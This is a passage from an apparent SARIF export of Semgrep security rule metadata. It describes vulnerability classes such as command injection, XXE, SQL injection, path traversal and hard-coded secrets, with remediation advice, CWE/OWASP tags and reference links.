are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.weak-ssl-context.weak-ssl-context)\n - [https://tools.ietf.org/html/rfc7568](https://tools.ietf.org/html/rfc7568)\n - [https://tools.ietf.org/id/draft-ietf-tls-oldversions-deprecate-02.html](https://tools.ietf.org/id/draft-ietf-tls-oldversions-deprecate-02.html)\n","text":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.weak-ssl-context.weak-ssl-context","id":"java.lang.security.audit.weak-ssl-context.weak-ssl-context","name":"java.lang.security.audit.weak-ssl-context.weak-ssl-context","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.weak-ssl-context.weak-ssl-context"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands."},"help":{"markdown":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.injection.tainted-system-command.tainted-system-command)\n - [https://www.stackhawk.com/blog/command-injection-java/](https://www.stackhawk.com/blog/command-injection-java/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html)\n - [https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-078/ExecUnescaped.java](https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-078/ExecUnescaped.java)\n","text":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands."},"helpUri":"https://semgrep.dev/r/java.spring.security.injection.tainted-system-command.tainted-system-command","id":"java.spring.security.injection.tainted-system-command.tainted-system-command","name":"java.spring.security.injection.tainted-system-command.tainted-system-command","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.injection.tainted-system-command.tainted-system-command"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://yaml.readthedocs.io/en/latest/api/](https://yaml.readthedocs.io/en/latest/api/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","id":"python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","name":"python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"help":{"markdown":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","id":"typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","name":"typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","properties":{"precision":"very-high","tags":["CWE-183: Permissive List of Allowed Inputs","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","id":"kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","name":"kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","id":"swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","name":"swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"File name based on user input risks server-side request forgery."},"help":{"markdown":"File name based on user input risks server-side request forgery.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-filename.tainted-filename)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"File name based on user input risks server-side request forgery."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-filename.tainted-filename","id":"php.lang.security.injection.tainted-filename.tainted-filename","name":"php.lang.security.injection.tainted-filename.tainted-filename","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-filename.tainted-filename"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","id":"java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","name":"java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion."},"help":{"markdown":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion."},"helpUri":"https://semgrep.dev/r/cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","id":"cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","name":"cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","id":"rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","name":"rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need."},"help":{"markdown":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","id":"java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","name":"java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","id":"python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","name":"python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf)\n - [https://github.com/jackc/pgx](https://github.com/jackc/pgx)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool](https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters."},"helpUri":"https://semgrep.dev/r/go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","id":"go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","name":"go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency"},"help":{"markdown":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.automatic-memory-pinning.automatic-memory-pinning)\n - [https://pytorch.org/docs/stable/data.html#memory-pinning](https://pytorch.org/docs/stable/data.html#memory-pinning)\n","text":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency"},"helpUri":"https://semgrep.dev/r/trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","id":"trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","name":"trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","properties":{"precision":"very-high","tags":["CWE-676: Use of Potentially Dangerous Function","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.automatic-memory-pinning.automatic-memory-pinning"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant code"},"help":{"markdown":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant code\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.iterate-over-empty-map.iterate-over-empty-map)\n - [https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/](https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/)\n","text":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant code"},"helpUri":"https://semgrep.dev/r/trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","id":"trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","name":"trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","properties":{"precision":"very-high","tags":["CWE-665: Improper Initialization","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.iterate-over-empty-map.iterate-over-empty-map"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as 